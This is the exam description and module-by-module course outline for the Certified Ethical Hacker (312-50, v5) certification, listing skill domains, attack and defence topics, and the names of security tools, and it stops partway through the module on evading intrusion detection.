Ethical Hacking and Countermeasures (312-50)
• The exam codes EC0-350 and 312-50 refer to the same exam.
• The exam titles "Certified Ethical Hacker" and "Ethical Hacking and Countermeasures" refer to the same exam.
• VUE and Prometric systems use different exam codes.
• The CEHv4 exam has been retired since June 1st 2007
• CEHv5 exam is available on Prometric Prime, APTC and VUE.
• Exams at VUE and Prometric APTC require an Eligibility Code.
• Please visit http://www.eccouncil.org/takeexam.htm for details.
Credit Towards Certification
Certified Ethical Hacker
Master of Security Science (MSS)
Skills Measured
The Exam 312-50 tests CEH candidates on the following 22 domains.
1. Ethics and Legal Issues
2. Footprinting
3. Scanning
4. Enumeration
5. System Hacking
6. Trojans and Backdoors
7. Sniffers
8. Denial of Service
9. Social Engineering
10. Session Hijacking
11. Hacking Web Servers
12. Web Application Vulnerabilities
13. Web Based Password Cracking Techniques
14. SQL Injection
15. Hacking Wireless Networks
16. Virus and Worms
17. Physical Security
18. Hacking Linux
19. IDS, Firewalls and Honeypots
20. Buffer Overflows
21. Cryptography
22. Penetration Testing Methodologies
Ethics and Legality
Understand Ethical Hacking terminology
Define the Job role of an ethical hacker
Understand the different phases involved in ethical hacking
Identify different types of hacking technologies
List the 5 stages of ethical hacking
What is hacktivism?
List different types of hacker classes
Define the skills required to become an ethical hacker
What is vulnerability research?
Describe the ways of conducting ethical hacking
Understand the Legal implications of hacking
Understand 18 U.S.C. § 1030 US Federal Law
Footprinting
Define the term Footprinting
Describe information gathering methodology
Describe competitive intelligence
Understand DNS enumeration
Understand Whois, ARIN lookup
Identify different types of DNS records
Understand how traceroute is used in Footprinting
Understand how e-mail tracking works
Understand how web spiders work
Scanning
Define the term port scanning, network scanning and vulnerability scanning
Understand the CEH scanning methodology
Understand Ping Sweep techniques
Understand nmap command switches
Understand SYN, Stealth, XMAS, NULL, IDLE and FIN scans
List TCP communication flag types
Understand War dialing techniques
Understand banner grabbing and OS fingerprinting techniques
Understand how proxy servers are used in launching an attack
How do anonymizers work?
Understand HTTP tunneling techniques
Understand IP spoofing techniques
Enumeration
What is Enumeration?
What is meant by null sessions
What is SNMP enumeration?
What are the steps involved in performing enumeration?
System hacking
Understanding password cracking techniques
Understanding different types of passwords
Identifying various password cracking tools
Understand Escalating privileges
Understanding keyloggers and other spyware technologies
Understand how to Hide files
Understanding rootkits
Understand Steganography technologies
Understand how to cover your tracks and erase evidence
Trojans and Backdoors
What is a Trojan?
What is meant by overt and covert channels?
List the different types of Trojans
What are the indications of a Trojan attack?
Understand how “Netcat” Trojan works
What is meant by “wrapping”
How does reverse connecting Trojans work?
What are the countermeasure techniques in preventing Trojans?
Understand Trojan evading techniques
Sniffers
Understand the protocols susceptible to sniffing
Understand active and passive sniffing
Understand ARP poisoning
Understand ethereal capture and display filters
Understand MAC flooding
Understand DNS spoofing techniques
Describe sniffing countermeasures
Denial of Service
Understand the types of DoS Attacks
Understand how DDoS attack works
Understand how BOTs/BOTNETS work
What is “smurf” attack
What is “SYN” flooding
Describe the DoS/DDoS countermeasures
Social Engineering
What is Social Engineering?
What are the Common Types of Attacks
Understand Dumpster Diving
Understand Reverse Social Engineering
Understand Insider attacks
Understand Identity Theft
Describe Phishing Attacks
Understand Online Scams
Understand URL obfuscation
Social Engineering countermeasures
Session Hijacking
Understand Spoofing vs. Hijacking
List the types of Session Hijacking
Understand Sequence Prediction
What are the steps in performing session hijacking
Describe how you would prevent session hijacking
Hacking Web Servers
List the types of web server vulnerabilities
Understand the attacks Against Web Servers
Understand IIS Unicode exploits
Understand patch management techniques
Understand Web Application Scanner
What is Metasploit Framework?
Describe Web Server hardening methods
Web Application Vulnerabilities
Understanding how web application works
Objectives of web application hacking
Anatomy of an attack
Web application threats
Understand Google hacking
Understand Web Application Countermeasures
Web Based Password Cracking Techniques
List the Authentication types
What is a Password Cracker?
How does a Password Cracker work?
Understand Password Attacks - Classification
Understand Password Cracking Countermeasures
SQL Injection
What is SQL injection?
Understand the Steps to conduct SQL injection
Understand SQL Server vulnerabilities
Describe SQL Injection countermeasures
Wireless Hacking
Overview of WEP, WPA authentication systems and cracking techniques
Overview of wireless Sniffers and SSID, MAC Spoofing
Understand Rogue Access Points
Understand Wireless hacking techniques
Describe the methods in securing wireless networks
Virus and Worms
Understand the difference between a virus and a worm
Understand the types of Viruses
How a virus spreads and infects the system
Understand antivirus evasion techniques
Understand Virus detection methods
Physical Security
Physical security breach incidents
Understanding physical security
What is the need for physical security?
Who is accountable for physical security?
Factors affecting physical security
Linux Hacking
Understand how to compile a Linux Kernel
Understand GCC compilation commands
Understand how to install LKM modules
Understand Linux hardening methods
Evading IDS, Honeypots and Firewalls
List the types of Intrusion Detection Systems and evasion techniques
List firewall and honeypot evasion techniques
Buffer Overflows
Overview of stack based buffer overflows
Identify the different types of buffer overflows and methods of detection
Overview of buffer overflow mutation techniques
Cryptography
Overview of cryptography and encryption techniques
Describe how public and private keys are generated
Overview of MD5, SHA, RC4, RC5, Blowfish algorithms
Penetration Testing Methodologies
Overview of penetration testing methodologies
List the penetration testing steps
Overview of the Pen-Test legal framework
Overview of the Pen-Test deliverables
List the automated penetration testing tools
Course Outline Version 5
Module 1: Introduction to Ethical Hacking
Why Security?
Essential Terminologies
Elements of Security
The Security, Functionality, and Ease of Use Triangle
What Does a Malicious Hacker Do?
o Reconnaissance
o Scanning
o Gaining access
o Maintaining access
o Covering Tracks
Types of Hacker Attacks
o Operating System attacks
o Application-level attacks
o Shrink Wrap code attacks
o Misconfiguration attacks
Hacktivism
Hacker Classes
Hacker Classes and Ethical Hacking
What Do Ethical Hackers Do?
Can Hacking be Ethical?
How to Become an Ethical Hacker?
Skill Profile of an Ethical Hacker
What is Vulnerability Research?
Why Hackers Need Vulnerability Research?
Vulnerability Research Tools
Vulnerability Research Websites
How to Conduct Ethical Hacking?
Approaches to Ethical Hacking
Ethical Hacking Testing
Ethical Hacking Deliverables
Computer Crimes and Implications
Legal Perspective
o U.S. Federal Law
o Japan’s Cyber Laws
o United Kingdom’s Cyber Laws
o Australia’s Cyber Laws
o Germany’s Cyber Laws
o Singapore’s Cyber Laws
Module 2: Footprinting
Revisiting Reconnaissance
Defining of Footprinting
Information Gathering Methodology
Unearthing Initial Information
Finding a Company’s URL
Internal URL
Extracting Archive of a Website
Google Search for Company’s Info.
People Search
Footprinting Through Job Sites
Passive Information Gathering
Competitive Intelligence Gathering
Why Do You Need Competitive Intelligence?
Companies Providing Competitive Intelligence Services
Competitive Intelligence
o When Did This Company Begin?
o How Did It Develop?
o What Are This Company's Plans?
o What Does Expert Opinion Say About The Company?
o Who Are The Leading Competitors?
Public and Private Websites
Tools
o DNS Enumerator
o SpiderFoot
o Sensepost Footprint Tools
• BiLE.pl
• BiLE-weigh.pl
• tld-expand.pl
• vet-IPrange.pl
• qtrace.pl
• vet-mx.pl
• jarf-rev
• jarf-dnsbrute
o Wikto Footprinting Tool
o Web Data Extractor Tool
o Whois
o Nslookup
o Necrosoft
o ARIN
o Traceroute
o Neo Trace
o GEOSpider
o Geowhere
o GoogleEarth
o VisualRoute Trace
o Kartoo Search Engine
o Touchgraph Visual Browser
o SmartWhois
o VisualRoute Mail Tracker
o eMailTrackerPro
o Read Notify
o HTTrack Web Site Copier
o Web Ripper
o robots.txt
o Website watcher
o E-mail Spider
o Power E-mail Collector Tool
Steps to Perform Footprinting
Module 3: Scanning
Definition of Scanning
Types of Scanning
o Port Scanning
o Network Scanning
o Vulnerability Scanning
Objectives of Scanning
CEH Scanning Methodology
o Check for live systems
• ICMP Scanning
• Angry IP
• HPING2
• Ping Sweep
• Firewalk
o Check for open ports
• Nmap
• TCP Communication Flags
• Three Way Handshake
• SYN Stealth / Half Open Scan
• Stealth Scan
• Xmas Scan
• FIN Scan
• NULL Scan
• IDLE Scan
• ICMP Echo Scanning/List Scan
• TCP Connect / Full Open Scan
• FTP Bounce Scan
• FTP Bounce Attack
• SYN/FIN Scanning Using IP Fragments
• UDP Scanning
• Reverse Ident Scanning
• RPC Scan
• Window Scan
• Blaster Scan
• PortScan Plus, Strobe
• IPSecScan
• NetScan Tools Pro
• WUPS – UDP Scanner
• SuperScan
• IPScanner
• MegaPing
• Global Network Inventory Scanner
• Net Tools Suite Pack
• FloppyScan
• War Dialer Technique
• Why War Dialing?
• Wardialing
• PhoneSweep
• THC Scan
• SandTrap Tool
o Banner grabbing/OS Fingerprinting
• OS Fingerprinting
• Active Stack Fingerprinting
• Passive Fingerprinting
• Active Banner Grabbing Using Telnet
• GET REQUESTS
• p0f – Banner Grabbing Tool
• p0f for Windows
• Httprint Banner Grabbing Tool
• Active Stack Fingerprinting
• XPROBE2
• RING V2
• Netcraft
• Disabling or Changing Banner
• Apache Server
• IIS Server
• IIS Lockdown Tool
• ServerMask
• Hiding File Extensions
• PageXchanger 2.0
o Identify Service
o Scan for Vulnerability
• Bidiblah Automated Scanner
• Qualys Web-based Scanner
• SAINT
• ISS Security Scanner
• Nessus
• GFI LANGuard
• SATAN (Security Administrator’s Tool for Analyzing Networks)
• Retina
• NIKTO
• SAFEsuite Internet Scanner
• IdentTCPScan
o Draw network diagrams of Vulnerable hosts
• Cheops
• FriendlyPinger
o Prepare proxies
• Proxy Servers
• Use of Proxies for Attack
• SocksChain
• Proxy Workbench
• ProxyManager Tool
• Super Proxy Helper Tool
• Happy Browser Tool (Proxy-based)
• MultiProxy
• TOR Proxy Chaining Software
o Anonymizers
• Primedius Anonymizer
• Browzar
• Torpark Browser
• G-Zapper - Google Cookies
o SSL Proxy Tool
o HTTP Tunneling Techniques
o HTTPort
o Spoofing IP Address - Source Routing
o Detecting IP Spoofing
o Despoof Tool
o Scanning Countermeasures
o Tool: SentryPC
Module 4: Enumeration
Overview of System Hacking Cycle
What is Enumeration?
Techniques for Enumeration
Netbios Null Sessions
Tool
o DumpSec
o NetBIOS Enumeration Using Netview
o Nbtstat
o SuperScan4
o Enum
o sid2user
o user2sid
o GetAcct
Null Session Countermeasures
PSTools
o PsExec
o PsFile
o PsGetSid
o PsKill
o PsInfo
o PsList
o PsLoggedOn
o PsLogList
o PsPasswd
o PsService
o PsShutdown
o PsSuspend
o PsUptime
SNMP Enumeration
Management Information Base
Tools
o SNMPutil
o Solarwinds
o SNScan V1.05
o Getif SNMP MIB Browser
UNIX Enumeration
SNMP UNIX Enumeration
SNMP Enumeration Countermeasures
Tools
o Winfingerprint
o Windows Active Directory Attack Tool
o IP Tools Scanner
o Enumerate Systems Using Default Passwords
Steps to Perform Enumeration
Module 5: System Hacking
Cracking Passwords
o Password Types
o Types of Password Attacks
o Passive Online – Wire Sniffing
o Passive Online Attacks
o Active Online – Password Guessing
o Offline Attacks
• Dictionary Attack
• Hybrid Attack
• Brute-force Attack
• Pre-computed Hashes
o Non-Technical Attacks
o Password Mitigation
o Permanent Account Lockout – Employee Privilege Abuse
o Administrator Password Guessing
o Manual Password Cracking Algorithm
o Automatic Password Cracking Algorithm
o Performing Automated Password Guessing
o Tools
• NAT
• Smbbf (SMB Passive Brute Force Tool)
• SmbCrack Tool
• Legion
• L0phtCrack
o Microsoft Authentication - LM, NTLMv1, and NTLMv2
o Kerberos Authentication
o What is LAN Manager Hash?
o Salting
o Tools
• PWdump2 and Pwdump3
• Rainbowcrack
• KerbCrack
• NBTDeputy
• NetBIOS DoS Attack
• John the Ripper
o Password Sniffing
o How to Sniff SMB Credentials?
o Sniffing Hashes Using L0phtCrack
o Tools
• ScoopLM
• SMB Replay Attacks
• Replay Attack Tool: SMBProxy
• Hacking Tool: SMB Grind
• Hacking Tool: SMBDie
o SMBRelay Weaknesses & Countermeasures
o Password Cracking Countermeasures
o LM Hash Backward Compatibility
o How to Disable LM HASH?
o Tools
• Password Brute-Force Estimate Tool
• Syskey Utility
Escalating Privileges
o Privilege Escalation
o Cracking NT/2000 Passwords
o Active@ Password Changer
o Change Recovery Console Password
o Privilege Escalation Tool: x.exe
Executing applications
o Tool:
• Psexec
• Remoexec
• Alchemy Remote Executor
• Keystroke Loggers
• E-mail Keylogger
• Spytector FTP Keylogger
• IKS Software Keylogger
• Ghost Keylogger
• Hardware Keylogger
• Keyboard Keylogger: KeyGhost Security Keyboard
• USB Keylogger: KeyGhost USB Keylogger
o What is Spyware?
o Tools
• Spyware: Spector
• Remote Spy
• eBlaster
• Stealth Voice Recorder
• Stealth Keylogger
• Stealth Website Logger
• Digi-Watcher Video Surveillance
• Desktop Spy Screen Capture Program
• Telephone Spy
• Print Monitor Spy Tool
• Perfect Keylogger
• Stealth Email Redirector
• Spy Software: Wiretap Professional
• Spy Software: FlexiSpy
• PC PhoneHome
o Keylogger Countermeasures
o Anti-Keylogger
o PrivacyKeyboard
Hiding Files
o Hacking Tool: RootKit
o Why Rootkits?
o Rootkits in Linux
o Detecting Rootkits
o Rootkit Detection Tools
• BlackLight from F-Secure Corp
• RootkitRevealer from Sysinternals
• Malicious Software Removal Tool from Microsoft Corp
o Sony Rootkit Case Study
o Planting the NT/2000 Rootkit
o Rootkits
• Fu
• AFX Rootkit 2005
• Nuclear
• Vanquish
o Rootkit Countermeasures
o Patchfinder2.0
o RootkitRevealer
o Creating Alternate Data Streams
o How to Create NTFS Streams?
o NTFS Stream Manipulation
o NTFS Streams Countermeasures
o NTFS Stream Detectors
• ADS Spy
• ADS Tools
o What is Steganography?
o Tools
• Merge Streams
• Invisible Folders
• Invisible Secrets 4
• Image Hide
• Stealth Files
• Steganography
• Masker Steganography Tool
• Hermetic Stego
• DCPP – Hide an Operating System
• Camera/Shy
• Mp3Stego
• Snow.exe
o Video Steganography
o Steganography Detection
o SIDS (Stego Intrusion Detection System)
o High-Level View
o Tool: dskprobe.exe
Covering tracks
o Disabling Auditing
o Clearing the Event Log
o Tools
• elsave.exe
• Winzapper
• Evidence Eliminator
• Traceless
• Tracks Eraser Pro
• ZeroTracks
Module 6: Trojans and Backdoors
Introduction
Effect on Business
What is a Trojan?
Overt and Covert Channels
Working of Trojans
Different Types of Trojans
What Do Trojan Creators Look For?
Different Ways a Trojan Can Get into a System
Indications of a Trojan Attack
Ports Used by Trojans
How to Determine which Ports are “Listening”?
Classic Trojans Found in the Wild
Trojans
o Tini
o iCmd
o NetBus
o Netcat
o Beast
o MoSucker
o Proxy Server
o SARS Trojan Notification
Wrappers
Wrapper Covert Program
Wrapping Tools
o One file EXE Maker
o Yet Another Binder
o Pretator Wrapper
Packaging Tool: WordPad
RemoteByMail
Tool: Icon Plus
Defacing Application: Restorator
HTTP Trojans
Trojan Attack through Http
HTTP Trojan (HTTP RAT)
Shttpd Trojan - HTTP Server
Reverse Connecting Trojans
Nuclear RAT Trojan (Reverse Connecting)
Tool: BadLuck Destructive Trojan
ICMP Tunneling
ScreenSaver Password Hack Tool – Dummylock
Trojan
o Phatbot
o Amitis
o Senna Spy
o QAZ
o Back Orifice
o Back Orifice 2000
o SubSeven
o CyberSpy Telnet Trojan
o Subroot Telnet Trojan
o Let Me Rule! 2.0 BETA 9
o Donald Dick
o RECUB
Hacking Tool: Loki
Atelier Web Remote Commander
Trojan Horse Construction Kit
How to Detect Trojans?
Tools
o Netstat
o fPort
o TCPView
o CurrPorts
o Process Viewer
o What’s on My Computer
o Super System Helper
Delete Suspicious Device Drivers
Inzider - Tracks Processes and Ports
Tools
o What's Running?
o MSConfig
o Registry-What’s Running
o Autoruns
o Hijack This (System Checker)
o Startup List
Anti-Trojan Software
Evading Anti-Virus Techniques
Evading Anti-Trojan/Anti-Virus Using Stealth Tools v2.0
Backdoor Countermeasures
Tools
o Tripwire
o System File Verification
o MD5sum.exe
o Microsoft Windows Defender
How to Avoid a Trojan Infection?
Module 7: Sniffers
Definition of Sniffing
Protocols Vulnerable to Sniffing
o Tool: Network View – Scans the Network for Devices
o The Dude Sniffer
o Ethereal
o tcpdump
Types of Sniffing
o Passive Sniffing
o Active sniffing
ARP - What is Address Resolution Protocol?
ARP Spoofing Attack
o How Does ARP Spoofing Work?
o ARP Poisoning
o Mac Duplicating Attack
Tools for ARP Spoofing
o Arpspoof (Linux-based tool)
o Ettercap (Linux and Windows)
MAC Flooding
Tools for MAC Flooding
o Macof (Linux-based tool)
o Etherflood (Linux and Windows)
Threats of ARP Poisoning
IRS – ARP Attack Tool
ARPWorks Tool
Tool: Nemesis
Sniffer Hacking Tools (dsniff package)
o Arpspoof
o Dnsspoof
o Dsniff
o Filesnarf
o Mailsnarf
o Msgsnarf
o Tcpkill
o Tcpnice
o Urlsnarf
o Webspy
o Webmitm
DNS Poisoning Techniques
Types of DNS Poisoning:
o Intranet DNS Spoofing (Local network)
o Internet DNS Spoofing (Remote network)
o Proxy Server DNS Poisoning
o DNS Cache Poisoning
Interactive TCP Relay
Sniffers
o HTTP Sniffer: EffeTech
o Ace Password Sniffer
o MSN Sniffer
o SmartSniff
o Session Capture Sniffer: NetWitness
o Session Capture Sniffer: NWreader
o Cain and Abel
o Packet Crafter Craft Custom TCP/IP Packets
o SMAC
o NetSetMan Tool
o Raw Sniffing Tools
o Sniffit
o Aldebaran
o Hunt
o NGSSniff
o Ntop
o Pf
o IPTraf
o EtherApe
o Netfilter
o Network Probe
o Maa Tec Network Analyzer
Tools
o Snort
o Windump
o Etherpeek
o Mac Changer
o Iris
o NetIntercept
o WinDNSSpoof
How to Detect Sniffing?
AntiSniff Tool
ArpWatch Tool
Countermeasures
Module 8: Denial of Service
What are Denial of Service Attacks?
Goal of DoS
Impact and the Modes of Attack
Types of Attacks
o DoS attack
o DDoS attack
DoS Attack Classification
o Smurf
o Buffer Overflow Attack
o Ping of death
o Teardrop
o SYN Attack
DoS Attack Tools
o Jolt2
o Bubonic.c
o Land and LaTierra
o Targa
o Blast20
o Nemesy
o Panther2
o Crazy Pinger
o Some Trouble
o UDP Flood
o FSMax
Botnets
Uses of botnets
Types of Bots
o Agobot/Phatbot/Forbot/XtremBot
o SDBot/RBot/UrBot/UrXBot
o mIRC-based Bots - GT-Bots
Tool: Nuclear Bot
What is DDoS Attack?
Characteristics of DDoS Attacks
DDoS Unstoppable
Agent Handler Model
DDoS IRC based Model
DDoS Attack Taxonomy
Amplification Attack
Reflective DNS Attacks
Reflective DNS Attacks Tool: ihateperl.pl
DDoS Tools
o Trin00
o Tribe Flood Network (TFN)
o TFN2K
o Stacheldraht
o Shaft
o Trinity
o Knight
o Mstream
o Kaiten
Worms
Slammer Worm
Spread of Slammer Worm – 30 min
MyDoom.B
SCO Against MyDoom Worm
How to Conduct a DDoS Attack
The Reflected DoS Attacks
Reflection of the Exploit
Countermeasures for Reflected DoS
DDoS Countermeasures
Taxonomy of DDoS Countermeasures
Preventing Secondary Victims
Detect and Neutralize Handlers
Detect Potential Attacks
Mitigate or Stop the Effects of DDoS Attacks
Deflect Attacks
Post-attack Forensics
Packet Traceback
Module 9: Social Engineering
What is Social Engineering?
Human Weakness
“Rebecca” and “Jessica”
Office Workers
Types of Social Engineering
o Human-based
o Computer-based
Preventing Insider Threat
Common Targets of Social Engineering
Factors that make Companies Vulnerable to Attacks
Why is Social Engineering Effective?
Warning Signs of an Attack
Tool: Netcraft Anti-Phishing Toolbar
Phases in a Social Engineering Attack
Behaviors Vulnerable to Attacks
Impact on the Organization
Countermeasures
Policies and Procedures
Security Policies - Checklist
Phishing Attacks and Identity Theft
What is Phishing?
Phishing Report
Attacks
Hidden Frames
URL Obfuscation
URL Encoding Techniques
IP Address to Base 10 Formula
Karen’s URL Discombobulator
HTML Image Mapping Techniques
Fake Browser Address Bars
Fake Toolbars
Fake Status Bar
DNS Cache Poisoning Attack
Module 10: Session Hijacking
What is Session Hijacking?
Spoofing vs. Hijacking
Steps in Session Hijacking
Types of Session Hijacking
o Active
o Passive
The 3-Way Handshake
TCP Concepts 3-Way Handshake
Sequence Number Prediction
TCP/IP Hijacking
RST Hijacking
RST Hijacking Tool: hijack_rst.sh
Programs that Perform Session Hijacking
Hacking Tools
o Juggernaut
o Hunt
o TTY Watcher
o IP Watcher
o T-Sight
o Paros HTTP Session
Remote TCP Session Reset Utility
Dangers Posed by Hijacking
Protecting against Session Hijacking
Countermeasure: IP Security
IP-SEC
Module 11: Hacking Web Servers
How Web Servers Work
How are Web Servers Compromised?
How are Web Servers Defaced?
Apache Vulnerability
Attacks Against IIS
o IIS Components
o IIS Directory Traversal (Unicode) Attack
Unicode
o Unicode Directory Traversal Vulnerability
Hacking Tool: IISxploit.exe
Msw3prt IPP Vulnerability
WebDAV / ntdll.dll Vulnerability
RPC DCOM Vulnerability
ASN Exploits
ASP Trojan (cmd.asp)
IIS Logs
Network Tool: Log Analyzer
Hacking Tool: CleanIISLog
Unspecified Executable Path Vulnerability
Metasploit Framework
Immunity CANVAS Professional
Core Impact
Hotfixes and Patches
What is Patch Management?
Solution: UpdateExpert
Patch Management Tool
o Qfecheck
o HFNetChk
cacls.exe Utility
Vulnerability Scanners
Online Vulnerability Search Engine
Network Tools
o Whisker
o N-Stealth HTTP Vulnerability Scanner
Hacking Tool: WebInspect
Network Tool: Shadow Security Scanner
SecureIIS
Countermeasures
File System Traversal Countermeasures
Increasing Web Server Security
Web Server Protection Checklist
Module 12: Web Application Vulnerabilities
Web Application Setup
Web Application Hacking
Anatomy of an Attack
Web Application Threats
Cross-Site Scripting/XSS Flaws
o Countermeasures
SQL Injection
Command Injection Flaws
o Countermeasures
Cookie/Session Poisoning
o Countermeasures
Parameter/Form Tampering
Buffer Overflow
o Countermeasures
Directory Traversal/Forceful Browsing
o Countermeasures
Cryptographic Interception
Cookie Snooping
Authentication Hijacking
o Countermeasures
Log Tampering
Error Message Interception
Attack Obfuscation
Platform Exploits
DMZ Protocol Attacks
o Countermeasures
Security Management Exploits
Web Services Attacks
Zero-Day Attacks
Network Access Attacks
TCP Fragmentation
Hacking Tools
o Instant Source
o Wget
o WebSleuth
o BlackWidow
o WindowBomb
o Burp
o cURL
o dotDefender
o Google Hacking
o Acunetix Web Scanner
o AppScan – Web Application Scanner
o AccessDiver
Module 13: Web-based Password Cracking Techniques
Definition of Authentication
Authentication Mechanisms
o HTTP Authentication
• Basic Authentication
• Digest Authentication
o Integrated Windows (NTLM) Authentication
o Negotiate Authentication
o Certificate-based Authentication
o Forms-based Authentication
o RSA Secure Token
o Biometrics
• Face recognition
• Iris scanning
• Retina scanning
• Fingerprinting
• Hand geometry
• Voice recognition
How to Select a Good Password?
Things to Avoid in Passwords
Changing Your Password
Protecting Your Password
How Hackers get hold of Passwords?
Windows XP: Remove Saved Passwords
Microsoft Password Checker
What is a Password Cracker?
Modus Operandi of an Attacker Using Password Cracker
How does a Password Cracker Work?
Classification of Attacks
Password Guessing
Query String
Cookies
Dictionary Maker
Available Password Crackers
o L0phtCrack
o John The Ripper
o Brutus
Hacking Tools
o Obiwan
o Authforce
o Hydra
o Cain And Abel
o RAR
o Gammaprog
o WebCracker
o Munga Bunga
o PassList
o SnadBoy
o WinSSLMiM
o ReadCookies.html
o Wireless WEP Key Password Spy
o RockXP
o Password Spectator
Countermeasures
Module 14: SQL Injection
Introducing SQL injection
Exploiting Web Applications
SQL Injection Steps
o What Should You Look For?
o What If It Doesn’t Take Input?
o OLE DB Errors
o Input Validation Attack
SQL Injection Techniques
How to Test for SQL Injection Vulnerability?
How does it Work?
Executing Operating System Commands
Getting Output of SQL Query
Getting Data from the Database Using ODBC Error Message
How to Mine all Column Names of a Table?
How to Retrieve any Data?
How to Update/Insert Data into Database?
Automated SQL Injection Tool
o AutoMagic SQL
o Absinthe
SQL Injection in Oracle
SQL Injection in MySQL Database
Attack against SQL Servers
SQL Server Resolution Service (SSRS)
Osql -L Probing
SQL Injection Automated Tools
o SQLDict
o SqlExec
o SQLbf
o SQLSmack
o SQL2.exe
SQL Injection Countermeasures
Preventing SQL Injection Attacks
SQL Injection Blocking Tool: SQLBlock
Acunetix Web Vulnerability Scanner
Module 15: Hacking Wireless Networks
Introduction to Wireless Networking
Wired Network vs. Wireless Network
Effects of Wireless Attacks on Business
Types of Wireless Networks
Advantages and Disadvantages of a Wireless Network
Wireless Standards
o 802.11a
o 802.11b – “WiFi”
o 802.11g
o 802.11i
o 802.11n
Related Technology and Carrier Networks
Antennas
Cantenna
Wireless Access Points
SSID
Beacon Frames
Is the SSID a Secret?
Setting Up a WLAN
Detecting a Wireless Network
How to Access a WLAN
Terminologies
Authentication and Association
Authentication Modes
Authentication and (Dis)Association Attacks
Rogue Access Points
Tools to Generate Rogue Access Points: Fake AP
Tools to Detect Rogue Access Points: Netstumbler
Tools to Detect Rogue Access Points: MiniStumbler
Wired Equivalent Privacy (WEP)
What is WPA?
WPA Vulnerabilities
WEP, WPA, and WPA2
Steps for Hacking Wireless Networks
o Step 1: Find networks to attack
o Step 2: Choose the network to attack
o Step 3: Analyze the network
o Step 4: Crack the WEP key
o Step 5: Sniff the network
Cracking WEP
Weak Keys (a.k.a. Weak IVs)
Problems with WEP’s Key Stream and Reuse
Automated WEP Crackers
Pad-Collection Attacks
XOR Encryption
Stream Cipher
WEP Tools
o Aircrack
o AirSnort
o WEPCrack
o WepLab
Temporal Key Integrity Protocol (TKIP)
LEAP: The Lightweight Extensible Authentication Protocol
LEAP Attacks
MAC Sniffing and AP Spoofing
Tool to Detect MAC Address Spoofing: Wellenreiter V2
Man-in-the-Middle Attack (MITM)
Denial-of-Service Attacks
DoS Attack Tool: Fatajack
Phone Jammers
Scanning Tools
o Redfang 2.5
o Kismet
o THC-WarDrive
o PrismStumbler
o MacStumbler
o Mognet
o WaveStumbler
o StumbVerter
o Netchaser V1.0 for Palm Tops
o AP Scanner
o SSID Sniff
o Wavemon
o Wireless Security Auditor (WSA)
o AirTraf
o Wifi Finder
o AirMagnet
Sniffing Tools
o AiroPeek
o NAI Wireless Sniffer
o Ethereal
o Aerosol v0.65
o vxSniffer
o EtherPEG
o DriftNet
o AirMagnet
o WinDump
o ssidsniff
Multiuse Tool: THC-RUT
PCR-PRO-1k Hardware Scanner
Tools
o WinPcap
o AirPcap
Securing Wireless Networks
Auditing Tool: BSD-Airtools
AirDefense Guard
WIDZ: Wireless Intrusion Detection System
Radius: Used as Additional Layer in Security
Google Secure Access
Module 16: Virus and Worms
Introduction to Virus
Virus History
Characteristics of a Virus
Working of Virus
o Infection Phase
o Attack Phase
Why Do People Create Computer Viruses?
Symptoms of Virus-Like Attack
Virus Hoaxes
Chain Letters
How is a Worm different from a Virus?
Indications of Virus Attack
Hardware Threats
Software Threats
Virus Damage
Modes of Virus Infection
Stages of Virus Life
Virus Classification
How does a Virus Infect?
Storage Patterns of a Virus
System Sector Viruses
Stealth Virus
Bootable CD-ROM Virus
Self-Modification
Encryption with a Variable Key
Polymorphic Code
Viruses
o Metamorphic Virus
o Cavity Virus
o Sparse Infector Virus
o Companion Virus
o File Extension Virus
o I Love You Virus
o Melissa Virus
Famous Virus/Worms – JS.Spth
Klez Virus Analysis
Writing a Simple Virus Program
Virus Construction Kits
Virus Detection Methods
Virus Incident Response
What is Sheep Dip?
Sheep Dip Computer
Virus Analysis - IDA Pro Tool
Prevention is Better than Cure
Latest Viruses
Top 10 Viruses - 2006
Anti-Virus Software
o AVG Free Edition
o Norton Antivirus
o McAfee
Socketshield
Popular Anti-Virus Packages
Virus Databases
Module 17: Physical Security
Security Statistics
Physical Security Breach Incidents
Understanding Physical Security
What Is the Need for Physical Security?
Who Is Accountable for Physical Security?
Factors Affecting Physical Security
Physical Security Checklist
o Company surroundings
o Premises
o Reception
o Server
o Workstation area
o Wireless access points
o Other equipment, such as fax, and removable media
o Access control
o Biometric Devices
o Smart Cards
o Security Token
o Computer equipment maintenance
o Wiretapping
o Remote access
o Locks
Information Security
EPS (Electronic Physical Security)
Wireless Security
Laptop Theft: Security Statistics
Laptop Theft
Laptop Security Tools
Laptop Tracker - XTool Computer Tracker
Tools to Locate Stolen Laptops
Stop's Unique, Tamper-proof Patented Plate
Tool: TrueCrypt
Laptop Security Countermeasures
Mantrap
TEMPEST
Challenges in Ensuring Physical Security
Spyware Technologies
Spying Devices
Physical Security: Lock Down USB Ports
Tool: DeviceLock
Blocking the Use of USB Storage Devices
Track Stick GPS Tracking Device
Module 18: Linux Hacking
Why Linux?
Linux Distributions
Linux – Basics
Linux Live CD-ROMs
Basic Commands of Linux
Linux File Structure
Linux Networking Commands
Directories in Linux
Compiling the Linux Kernel
How to Install a Kernel Patch?
Compiling Programs in Linux
GCC Commands
Make Install Command
Linux Vulnerabilities
Chrooting
Why is Linux Hacked?
Linux Vulnerabilities in 2005
How to Apply Patches to Vulnerable Programs?
Scanning Networks
Tools
o Nmap in Linux
o Scanning Tool: Nessus
o Tool: Cheops
o Port Scan Detection Tools
Password Cracking in Linux
Firewall in Linux: IPTables
Basic Linux Operating System Defense
SARA (Security Auditor's Research Assistant)
Linux Tool
o Netcat
o tcpdump
o Snort
o SAINT
o Ethereal
o Abacus Port Sentry
o DSniff Collection
o Hping2
o Sniffit
o Nemesis
o LSOF
o IPTraf
o LIDS
o Hunt
o TCP Wrappers
Linux Loadable Kernel Modules
Hacking Tool: Linux Rootkits
Rootkits
o Knark
o Torn
o Tuxit
o Adore
o Ramen
o Beastkit
Rootkit Countermeasures
Linux Tools: Application Security
Advanced Intrusion Detection Environment (AIDE)
Linux Tools
o Security Testing Tools
o Encryption
o Log and Traffic Monitors
o Security Auditing Tool (LSAT)
Linux Security Countermeasures
Steps for Hardening Linux
Module 19: Evading IDS, Firewalls, and Honeypots
Introduction to Intrusion Detection Systems
Terminologies
o Intrusion Detection System (IDS)
• IDS Placement
• Ways to Detect an Intrusion
• Types of Intrusion Detection Systems
• System Integrity Verifiers (SIV)
• Tripwire
• Cisco Security Agent (CSA)
• Signature Analysis
• General Indications of Intrusion System Indications
• General Indications of Intrusion File System Indications
• General Indications of Intrusion Network Indications
• Intrusion Detection Tools
• Snort 2.x
